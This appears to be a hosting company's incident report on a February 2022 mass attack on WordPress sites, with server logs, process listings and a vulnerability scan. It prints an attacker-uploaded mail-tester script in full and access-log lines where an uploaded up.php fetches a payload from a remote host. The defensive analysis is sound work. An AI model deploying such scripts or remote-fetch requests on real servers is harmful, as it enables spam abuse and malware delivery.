Of course we cannot always share details about our work with customers, but nevertheless it is nice to show our technical achievements and share some of our implemented solutions.
Widely used Content Management Systems (CMS), such as Wordpress, Joomla, Drupal and others are welcome targets for hack attempts. Every once in a while, such a CMS is hacked - mostly due to vulnerability exploits. In most cases, the person to blame is actually the webmaster/site administrator of the affected CMS: Leaving a web application un-patched is the same as never patching an Operating System - with an even easier attack surface.
In the past couple of days (February 2022) many new Wordpress vulnerabilities have been made public, including scripts and proof of concepts how to exploit these vulnerabilities.
In the evening of February 16th we discovered massive amount of requests on a customer's shared hosting server. We first suspected a DOS attack, originating from a network range in Spain (37.120.142.0/24; abuse contacted). But looking closer at the requests showed that not only one website was targeted - many different domains were attacked at the same time. All websites had one thing in common: They all use Wordpress.
From Apache's server status:
80-1 9461 0/525/1584 W 1.02 0 0 0.0 2.60 9.07 37.120.142.25 http/1.1 example1.com:7081 POST //xmlrpc.php HTTP/1.0
83-1 23169 0/1025/2339 W 2.17 1 0 0.0 5.76 16.72 37.120.142.25 http/1.1 example2.de:7081 POST //xmlrpc.php HTTP/1.0
84-1 23213 0/304/1363 W 0.62 12 0 0.0 1.47 7.12 37.120.142.25 http/1.1 example3.ch:7081 POST //xmlrpc.php HTTP/1.0
87-1 17995 0/399/3266 W 0.89 2 0 0.0 2.58 22.49 37.120.142.25 http/1.1 example4.net:7081 POST //xmlrpc.php HTTP/1.0
88-1 21627 0/343/1436 W 0.74 0 0 0.0 1.71 7.06 37.120.142.25 http/1.1 example5.ch:7081 POST //xmlrpc.php HTTP/1.0
89-1 3896 0/28/846 W 0.28 4 0 0.0 0.11 5.05 37.120.142.25 http/1.1 example6.ch:7081 POST //xmlrpc.php HTTP/1.0
90-1 31157 0/151/1285 W 0.31 10 0 0.0 0.62 6.26 37.120.142.25 http/1.1 example7.ch:7081 POST //xmlrpc.php HTTP/1.0
94-1 9471 0/560/846 W 1.20 2 0 0.0 2.98 4.59 37.120.142.25 http/1.1 example8.net:7081 POST //xmlrpc.php HTTP/1.0
95-1 3906 0/28/648 _ 0.05 0 4536 0.0 0.09 3.45 37.120.142.25 http/1.1 example4.net:7080 POST /xmlrpc.php HTTP/1.0
96-1 18000 0/373/898 W 0.76 3 0 0.0 2.28 4.95 37.120.142.25 http/1.1 example9.com:7081 POST //wp-login.php HTTP/1.0
97-1 28399 0/831/837 W 1.69 2 0 0.0 4.69 4.71 37.120.142.25 http/1.1 example14.ch:7081 POST //wp-login.php HTTP/1.0
100-1 18002 0/409/800 W 0.77 3 0 0.0 2.62 4.60 37.120.142.25 http/1.1 example15.ch:7081 POST //xmlrpc.php HTTP/1.0
101-1 23244 0/287/837 W 0.59 3 0 0.0 1.22 4.21 37.120.142.25 http/1.1 example14.ch:7081 POST //wp-login.php HTTP/1.0
102-1 21632 0/333/808 W 0.62 2 0 0.0 2.01 6.11 37.120.142.25 http/1.1 example9.com:7081 POST //wp-login.php HTTP/1.0
104-1 9498 0/567/866 W 1.18 5 0 0.0 3.07 4.70 37.120.142.25 http/1.1 example10.com:7080 POST //xmlrpc.php HTTP/1.0
106-1 3915 0/23/759 W 0.11 1 0 0.0 0.10 5.48 37.120.142.25 http/1.1 example11.ch:7080 POST //xmlrpc.php HTTP/1.0
108-1 3917 0/29/588 W 0.07 10 0 0.0 0.12 4.67 37.120.142.25 http/1.1 example12.ch:7081 POST //xmlrpc.php HTTP/1.0
109-1 3918 0/21/691 W 0.07 1 0 0.0 0.10 4.50 37.120.142.25 http/1.1 example10.com:7080 POST //xmlrpc.php HTTP/1.0
113-1 3923 0/19/546 W 0.06 0 0 0.0 0.11 3.97 37.120.142.25 http/1.1 example13.ch:7080 POST //xmlrpc.php HTTP/1.0
115-1 12306 0/510/725 W 1.08 10 0 0.0 2.76 4.13 37.120.142.25 http/1.1 example16.ch:708 POST //xmlrpc.php HTTP/1.0
116-1 18771 0/374/709 W 0.71 3 0 0.0 2.28 4.37 37.120.142.25 http/1.1 example17.ch:7081 POST //wp-login.php HTTP/1.0
117-1 9507 0/566/716 W 1.24 8 0 0.0 3.24 4.20 37.120.142.25 http/1.1 example18.ch:7081 POST //wp-login.php HTTP/1.0
118-1 9512 0/554/739 W 1.16 10 0 0.0 2.96 3.85 37.120.142.25 http/1.1 example19.ch:7081 POST //wp-login.php HTTP/1.0
120-1 3925 0/33/529 W 0.09 0 0 0.0 0.13 2.69 37.120.142.25 http/1.1 example20.com:7081 POST //xmlrpc.php HTTP/1.0
121-1 9517 0/578/688 W 1.10 2 0 0.0 3.69 4.34 37.120.142.25 http/1.1 example4.net:7081 POST //xmlrpc.php HTTP/1.0
Sending massive POST requests to wp-login.php and xmlrpc.php usually indicates a brute force attack trying to find correct credential combinations. Both of these scripts do not have (by default) any connection or number of false login limit hence they are a welcome target for these attacks.
Note: See a related article how to protect your Wordpress blog from brute force login attacks.
Such brute force attacks happens regularly on a Wordpress site - but the scale of this attack surprised us. The attacker must have a database of (global) Wordpress installations at hand.
At the peak of the attack, the attack used a bandwidth of ~13MB/s (= 104 Mbit/s):
Of course we blocked the attacks as soon as we (our monitoring) discovered them, but whether the attacker was successful or not only time would tell.
The next day we found a couple of Wordpress installations that were hacked. Either by exploiting a vulnerability or by finding a correct login combination from the brute-force attack. But the successful hack resulted in many different situations, how the attempted access was used.
Of course, sending spam mails is always one of the goals. Especially if the server is not on any blacklist, this gives the server more (smtp) credibility - but it's more interesting for spammers as well. On one Wordpress installation we've found uploaded files containing the Leaf PHP Mailer malware. This PHP script is known for sending mass e-mails and even includes DNSBL checks.
root@server ~ # ll /var/www/vhosts/example4.net/httpdocs/domain/unz.php
-rw-r--r-- 1 example4 psacln 166104 Feb 17 06:32 /var/www/vhosts/example4.net/httpdocs/domain/unz.php
root@server ~ # more /var/www/vhosts/example4.net/httpdocs/domain/unz.php
<?php
/**
* Leaf PHP Mailer by [leafmailer.pw]
* @version : 2.8
**/
$password = ""; // Password
Prior to the upload of unz.php, another PHP script (tester.php) was uploaded to test the ability to send e-mails:
root@server # stat tester.php
File: tester.php
Size: 796 Blocks: 8 IO Block: 4096 regular file
Device: fe02h/65026d Inode: 53901849 Links: 1
Access: (0644/-rw-r--r--) Uid: (10026/ example4) Gid: ( 1005/ psacln)
Access: 2022-02-17 02:46:03.546900843 +0100
Modify: 2022-02-17 02:45:59.195004007 +0100
Change: 2022-02-17 02:45:59.195004007 +0100
Birth: -
root@server # cat tester.php
<?php
error_reporting(0);
echo '<head>
<title> Email sending tester</title>
</head>
<body><b><color> Email sending tester</color></b><br>Write your email and click on send email test<br>
<form method="post">
<input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="username@domain.tld" value="' . $_POST['email'] . '">
<input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;">
</form>
<br>
</body>';
if (isset($_POST['email']))
{
$rnd = rand();
mail($_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!");
print "<font color=orange><b>Email Sent To: " . $_POST['email'] . ", Report ID: " . $rnd . "</b></font>";
}
By analyzing how tester.php appeared on the server, yet another file (local.php) was detected. Looking closer at it revealed it's a (beautiful) web shell:
Once such a web shell is on the server, it's very easy for an attacker to upload additional and manipulate and delete existing files.
But when did this web shell get on the server? Another analysis showed it was uploaded on February 16th, during the mass attack:
root@server # ls -l local.php
-rw-r--r-- 1 example4 psacln 39507 Feb 16 22:01 local.php
Obviously the attack on February 16h was not only a brute-force attack. The attack also involved exploiting vulnerabilities and uploading new files (such as web shells).
A rather rare case is the execution of scripts which keep running as a process. This was also detected following the attacks on February 16:
root@server ~ # ps auxf|grep lock360.php
root 6814 0.0 0.0 6076 832 pts/6 S+ 08:37 0:00 \_ grep --color=auto lock360.php
10207 10279 0.0 0.0 361172 38688 ? S 07:33 0:03 \_ /opt/plesk/php/7.3/bin/php /var/www/vhosts/example8.net/httpdocs/wp-admin/css/colors/blue/lock360.php
By using strace on the PID, we could see that the script was running in a loop, therefore keeping the process alive.
Interesting in this case was that the process was launched via HTTP:
173.208.202.234 - - [17/Feb/2022:07:33:54 +0100] "GET /wp-admin/css/colors/blue/lock360.php?action=lock HTTP/1.0" 200 1044 "http://example8.net/wp-admin/css/colors/blue/lock360.php?action=check" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
This seems to start the process but at the same time deleted the file itself - which removes it from the filesystem, however it is kept in memory by the running process.
Other similar processes were detected on the system, all with similar names:
example19 2777 0.0 0.0 361108 36436 ? S 04:45 0:03 /opt/plesk/php/7.3/bin/php /var/www/vhosts/example19.ch/httpdocs/l.php
example2 5442 0.0 0.0 376740 41028 ? S 06:36 0:01 /opt/plesk/php/5.6/bin/php /var/www/vhosts/example2.de/httpdocs/lock666.php
Unfortunately as the files were removed from the file system as soon as they are launched, we could not analyze it. But we believe the purpose of these processes was to attack other remote servers.
Update: We REALLY wanted to find out, what the process is doing, so we went into deep-dive analysis. In our next article, we share our technical analysis of a deleted script running as a process and reading its PHP code from memory.
Another way a hacked Wordpress can be abused, is to use the malicious files to download additional files from a remote source. Here nicely seen by using an uploaded script (up.php):
62.201.241.20 - - [16/Feb/2022:22:20:38 +0100] "GET /wp-content/plugins/patixrzkax/up.php HTTP/1.0" 200 576 "yahoo.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
62.201.241.20 - - [16/Feb/2022:22:26:58 +0100] "POST /wp-content/plugins/patixrzkax/up.php?php=anonymousfox.is/__@v6PnSVM/p1.txt HTTP/1.0" 200 603 "yahoo.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
62.201.241.20 - - [16/Feb/2022:22:27:01 +0100] "POST /wp-content/plugins/patixrzkax/up.php?php=anonymousfox.is/__@v6PnSVM/p1.txt HTTP/1.0" 200 649 "yahoo.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
Especially annoying here is the fact, that the domain anonymousfox.is is hosted behind a CloudFlare proxy. Blocking the outgoing requests to Cloudflare ranges would be possible, but other (working and legit) applications would likely suffer, too.
Luckily there are a couple of very good (open source) vulnerability scanners available, which help you discover any (known) Wordpress vulnerabilities. One of the most used scanners is wpscan, another good scanner is Pompem. Although the latter hasn't been updated in years, it still works to detect recent vulnerabilities.
Here we let pompem run on one of the affected Wordpress sites:
root@server /var/www/vhosts/example19.ch/httpdocs # pompem -s Wordpress
[...]
+Results Wordpress
+----------------------------------------------------------------------------------------------------+
+Date Description Url
+----------------------------------------------------------------------------------------------------+
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | https://packetstormsecurity.com/files/166029/WordPress-Cozmoslabs-Profile-Builder-3.6.1-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | https://packetstormsecurity.com/files/165985/WordPress-Error-Log-Viewer-1.1.1-Arbitrary-File-Deletion.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-14 | WordPress International SMS For Contact Form 7 Int | https://packetstormsecurity.com/files/165969/WordPress-International-SMS-For-Contact-Form-7-Integration-1.2-CSRF.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 | WordPress VeronaLabs WP Statistics 13.1.4 SQL Inje | https://packetstormsecurity.com/files/165949/WordPress-VeronaLabs-WP-Statistics-13.1.4-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 | WordPress Secure Copy Content Protection And Conte | https://packetstormsecurity.com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2.8.1-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 | WordPress Jetpack 9.1 Cross Site Scripting | https://packetstormsecurity.com/files/165942/WordPress-Jetpack-9.1-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 | WordPress 5.9 Cross Site Scripting | https://packetstormsecurity.com/files/165940/WordPress-5.9-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress Simple Job Board 2.9.3 Local File Inclus | https://packetstormsecurity.com/files/165892/WordPress-Simple-Job-Board-2.9.3-Local-File-Inclusion.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress Contact Form Builder 1.6.1 Cross Site Sc | https://packetstormsecurity.com/files/165889/WordPress-Contact-Form-Builder-1.6.1-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress CP Blocks 1.0.14 Cross Site Scripting | https://packetstormsecurity.com/files/165887/WordPress-CP-Blocks-1.0.14-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress Security Audit 1.0.0 Cross Site Scriptin | https://packetstormsecurity.com/files/165886/WordPress-Security-Audit-1.0.0-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-07 | WordPress International SMS For Contact Form 7 Int | https://packetstormsecurity.com/files/165883/WordPress-International-SMS-For-Contact-Form-7-Integration-1.2-XSS.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-04 | WordPress IP2Location Country Blocker 2.26.7 Cross | https://packetstormsecurity.com/files/165857/WordPress-IP2Location-Country-Blocker-2.26.7-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Learnpress 4.1.4.1 Arbitrary Image Renam | https://packetstormsecurity.com/files/165825/WordPress-Learnpress-4.1.4.1-Arbitrary-Image-Renaming.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Contact Form Check Tester 1.0.2 XSS / Ac | https://packetstormsecurity.com/files/165814/WordPress-Contact-Form-Check-Tester-1.0.2-XSS-Access-Control.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Domain Check 1.0.16 Cross Site Scripting | https://packetstormsecurity.com/files/165811/WordPress-Domain-Check-1.0.16-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | https://packetstormsecurity.com/files/165809/WordPress-Download-Monitor-WordPress-4.4.4-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Product Slider For WooCommerce 1.13.21 C | https://packetstormsecurity.com/files/165805/WordPress-Product-Slider-For-WooCommerce-1.13.21-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress Post Grid 2.1.1 Cross Site Scripting | https://packetstormsecurity.com/files/165804/WordPress-Post-Grid-2.1.1-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | WordPress 404 To 301 2.0.2 SQL Injection | https://packetstormsecurity.com/files/165803/WordPress-404-To-301-2.0.2-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | https://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 | WordPress Modern Events Calendar 6.1 SQL Injection | https://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 | WordPress Mortgage Calculators WP 1.52 Cross Site | https://packetstormsecurity.com/files/165734/WordPress-Mortgage-Calculators-WP-1.52-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-19 | WordPress Email Template Designer – WP HTML | https://packetstormsecurity.com/files/165606/WordPress-Email-Template-Designer-WP-HTML-Mail-3.0.9-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-13 | WordPress Core 5.8.2 SQL Injection | https://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-12 | WordPress Frontend Uploader 1.3.2 Cross Site Scrip | https://packetstormsecurity.com/files/165515/WordPress-Frontend-Uploader-1.3.2-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-10 | WordPress Contact Form Entries Cross Site Scriptin | https://packetstormsecurity.com/files/165500/WordPress-Contact-Form-Entries-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 | WordPress Catch Themes Demo Import Shell Upload | https://packetstormsecurity.com/files/165463/WordPress-Catch-Themes-Demo-Import-Shell-Upload.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 | WordPress AAWP 3.16 Cross Site Scripting | https://packetstormsecurity.com/files/165451/WordPress-AAWP-3.16-Cross-Site-Scripting.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 | WordPress The True Ranker 2.2.2 Arbitrary File Rea | https://packetstormsecurity.com/files/165434/WordPress-The-True-Ranker-2.2.2-Arbitrary-File-Read.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 | WordPress WP Visitor Statistics 4.7 SQL Injection | https://packetstormsecurity.com/files/165433/WordPress-WP-Visitor-Statistics-4.7-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | https://cxsecurity.com/issue/WLB-2022020089
+----------------------------------------------------------------------------------------------------+
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | https://cxsecurity.com/issue/WLB-2022020073
+----------------------------------------------------------------------------------------------------+
+ 2022-02-15 | WordPress International SMS For Contact Form 7 Int | https://cxsecurity.com/issue/WLB-2022020069
+----------------------------------------------------------------------------------------------------+
+ 2022-02-14 | WordPress Secure Copy Content Protection And Conte | https://cxsecurity.com/issue/WLB-2022020068
+----------------------------------------------------------------------------------------------------+
+ 2022-02-14 | WordPress Plugin Post Grid 2.1.1 Cross Site Script | https://cxsecurity.com/issue/WLB-2022020063
+----------------------------------------------------------------------------------------------------+
+ 2022-02-09 | WordPress Plugin CP Blocks 1.0.14 Stored Cross Sit | https://cxsecurity.com/issue/WLB-2022020052
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress Plugin Product Slider for WooCommerce 1. | https://cxsecurity.com/issue/WLB-2022020042
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress CP Blocks 1.0.14 Cross Site Scripting | https://cxsecurity.com/issue/WLB-2022020036
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 | WordPress Security Audit 1.0.0 Cross Site Scriptin | https://cxsecurity.com/issue/WLB-2022020034
+----------------------------------------------------------------------------------------------------+
+ 2022-02-07 | WordPress IP2Location Country Blocker 2.26.7 Cross | https://cxsecurity.com/issue/WLB-2022020031
+----------------------------------------------------------------------------------------------------+
+ 2022-02-07 | WordPress International SMS For Contact Form 7 Int | https://cxsecurity.com/issue/WLB-2022020021
+----------------------------------------------------------------------------------------------------+
+ 2022-02-04 | WordPress Post Grid 2.1.1 Cross Site Scripting | https://cxsecurity.com/issue/WLB-2022020018
+----------------------------------------------------------------------------------------------------+
+ 2022-02-03 | WordPress Learnpress 4.1.4.1 Arbitrary Image Renam | https://cxsecurity.com/issue/WLB-2022020014
+----------------------------------------------------------------------------------------------------+
+ 2022-02-03 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | https://cxsecurity.com/issue/WLB-2022020013
+----------------------------------------------------------------------------------------------------+
+ 2022-02-03 | WordPress Product Slider For WooCommerce 1.13.21 C | https://cxsecurity.com/issue/WLB-2022020012
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 | Wordpress Plugin 404 to 301 2.0.2 SQL-Injection (A | https://cxsecurity.com/issue/WLB-2022020005
+----------------------------------------------------------------------------------------------------+
+ 2022-01-28 | WordPress Modern Events Calendar 6.1 SQL Injection | https://cxsecurity.com/issue/WLB-2022010143
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | https://cxsecurity.com/issue/WLB-2022010135
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 | WordPress Mortgage Calculators WP 1.52 Cross Site | https://cxsecurity.com/issue/WLB-2022010131
+----------------------------------------------------------------------------------------------------+
+ 2022-01-18 | WordPress Plugin WP Visitor Statistics 4.7 SQL Inj | https://cxsecurity.com/issue/WLB-2022010098
+----------------------------------------------------------------------------------------------------+
Even though this Wordpress installation was updated (probably in January 2022 as the output suggests), that was not enough to keep up with the recent vulnerabilities. A weekly update should actually be mandatory for every Wordpress installation. But as written above: This depends on a responsible site administrator.